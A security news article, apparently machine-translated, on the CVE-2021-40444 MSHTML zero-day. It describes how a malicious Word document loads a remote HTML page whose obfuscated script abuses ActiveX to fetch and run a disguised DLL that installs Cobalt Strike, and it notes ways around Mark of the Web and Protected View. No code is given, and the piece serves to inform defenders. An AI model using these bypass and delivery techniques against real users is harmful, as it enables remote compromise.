On September 7, Microsoft issued a security bulletin saying that it had discovered a remote code execution vulnerability in Windows IE MSHTML, CVE number CVE-2021-40444. As no patch has been released for the vulnerability, Microsoft said only that the vulnerability could use malicious ActiveX controls to exploit Office 365 and Office 2019 to download and install malicious software on affected Windows 10 hosts.

Subsequently, the researchers found that there was an attack using the malicious Word document, which is a 0 day in the wild exploitation of the vulnerability.

When office opens a document, it checks to see if it is marked “Mark of the Web” (MoTW), which indicates that it originated from the Internet. If the TAB exists, Microsoft opens the document in read-only mode unless the user clicks the Enable edit button.

Protect the Word file opened by the view

Vulnerability analyst Will Dormann said that protecting view features can mitigate the vulnerability. But Dormann said that while protecting view features can prevent the vulnerability, historical data suggests that many users ignore the warnings and click on the enable edit button.

But there are many ways to make a file that does not accept MoTW tags. If the file is in a container, you may not be aware of MotW’s presence, such as when 7ZIP opens the downloaded compressed file, the extracted file will not have markings from the Internet. Similarly, if the file is in an ISO file, Windows users can double-click ISO to open it. But Windows doesn’t treat the content as coming from the Internet.

In addition, Dormann found that the vulnerability could be exploited in RTF files, which do not have Office protected view security features.

Microsoft previously issued steps to prevent ActiveX from running in IE to intercept possible attack activity. But security researcher Kevin Beaumont has found a way around Microsoft’s mitigation measures.

Attack activity used in malicious word file is called ‘A Letter before court 4. Docx’ (www.virustotal.com/gui/file/d0…

Because the file was downloaded from the Internet, it will be marked Mark of the Web and will be opened in word Protected view.

Malicious Word using CVE-2021-40444 vulnerability

Once the user clicks the enable edit button, the exploit uses the MHTML protocol to open a side.html file at a remote site, which is loaded as a Word template.

Once the ‘MHTML’ URL is registered with IE, the browser starts loading HTML and its obfuscated JS code exploits the CVE-2021-40444 vulnerability by creating malicious ActiveX control.

Confused JS code in the side.html file

The ActiveX control downloads the ministry. Cab file from a remote site, extracts the championship. Inf file (actually a DLL file), and executes it as a CPL file.

Inf file to execute as CPL file

TrendMicro says the ultimate Payload will install Cobalt Strike, a piece of malware that allows attackers to gain remote access to devices.

Once an attacker gains remote access to a victim’s computer, it can be used to spread malware across the network, install other malware, steal files, and deploy ransomware.

Due to the severity of the vulnerability, the researchers advised users to only open attachments from trusted sources.

【 Network Security Learning Materials 】